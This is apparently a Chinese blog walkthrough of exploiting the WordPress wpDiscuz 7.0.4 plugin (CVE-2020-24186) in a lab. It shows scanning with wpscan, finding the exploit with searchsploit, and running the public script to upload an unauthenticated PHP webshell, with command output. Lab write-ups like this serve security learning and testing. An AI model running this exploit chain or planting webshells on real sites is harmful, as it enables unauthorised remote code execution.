【wordpress-wpdiscuz-rce】

java 复制代码
┌──(root㉿kali)-[~]
└─# wpscan --url http://192.168.142.131:83/ --plugins-detection aggressive
┌──(root㉿kali)-[~]
└─# searchsploit wpdiscuz
-------------------------------------------------------------- ---------------------------------
 Exploit Title                                                |  Path
-------------------------------------------------------------- ---------------------------------
Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unau | php/webapps/49962.sh
WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unau | php/webapps/49967.py
Wordpress Plugin wpDiscuz 7.0.4 - Unauthenticated Arbitrary F | php/webapps/49401.rb
-------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

已知漏洞:

  1. 任意文件上传 (49962.sh)

  2. 远程代码执行 (49967.py)

  3. 未授权任意文件上传 (49401.rb)

这些漏洞都是针对 wpDiscuz 7.0.4 版本的。

将指定的 exploit 文件复制到当前工作目录:

┌──(root㉿kali)-[~]

└─# searchsploit -m 49967

Exploit: WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated)

URL: https://www.exploit-db.com/exploits/49967

Path: /usr/share/exploitdb/exploits/php/webapps/49967.py

Codes: CVE-2020-24186

Verified: False

File Type: Python script, Unicode text, UTF-8 text executable, with very long lines (864)

Copied to: /root/49967.py

┌──(root㉿kali)-[~]

└─# python3 49967.py

+\] Specify an url target \[+\] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost \[+\] Example help usage: exploit.py -h 所以我们找日志路径 ![](https://i-blog.csdnimg.cn/direct/ae7b20264e2f4285849f20a7d38ef97d.png)

python3 49967.py -u http://192.168.142.131:83 -p /2025/04/22/hello-world/

  • python3 49967.py:运行 Python exploit 脚本

  • -u http://192.168.142.131:83:指定目标 WordPress 站点的 URL

  • -p /2025/04/22/hello-world/:指定包含 wpDiscuz 评论插件的文章路径

java 复制代码
┌──(root㉿kali)-[~]
└─# python3 49967.py -u http://192.168.142.131:83 -p /2025/04/22/hello-world/
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
--------------------------------------------------------------- 

[+] Response length:[105102] | code:[200]
[!] Got wmuSecurity value: 501d0d4c77
[!] Got wmuSecurity value: 1 

[+] Generating random name for Webshell...
[!] Generated webshell name: fbmthofztipssba

[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:url":"http://192.168.142.131:83/wp-content/uploads/2026/01/fbmthofztipssba-1769068648.6248.php" 

这里回显成功上传webshell,访问这个路径可以看到数据

拼接cmd可以发现没有登录的情况下也能查看id等数据

相关推荐
草莓熊Lotso1 天前
【Linux系统加餐】从原理到封装:基于建造者模式实现System V信号量工业级C++封装
android·linux·运维·服务器·网络·c++·建造者模式
齐齐大魔王1 天前
Linux-网络编程实战
linux·运维·网络
智塑未来1 天前
app应用怎么接入广告?标准流程与落地实操方案全解析
大数据·网络·人工智能
Sun@happy1 天前
现代 Web 前端渗透——基础篇(1)
前端·web安全
wanhengidc1 天前
私有云的作用都有哪些?
运维·服务器·网络·游戏·智能手机
CTO Plus技术服务中1 天前
71款企业级自研产品,线上演示环境
网络
网教盟人才服务平台1 天前
全国政务网络安全能力提升行动启动,筑牢政务数据安全防线
安全·web安全·政务
Bruce_Liuxiaowei1 天前
2026年5月第4周网络安全形势周报
网络·人工智能·安全·web安全·网络安全·系统安全
HMS工业网络1 天前
边缘网关网络安全
网络·安全·web安全
AI科技星1 天前
全域数学·第三部·数术几何部·平行网格卷 完整专著目录(含拓扑发展史+学科定位·终稿)
c语言·开发语言·网络·量子计算·agi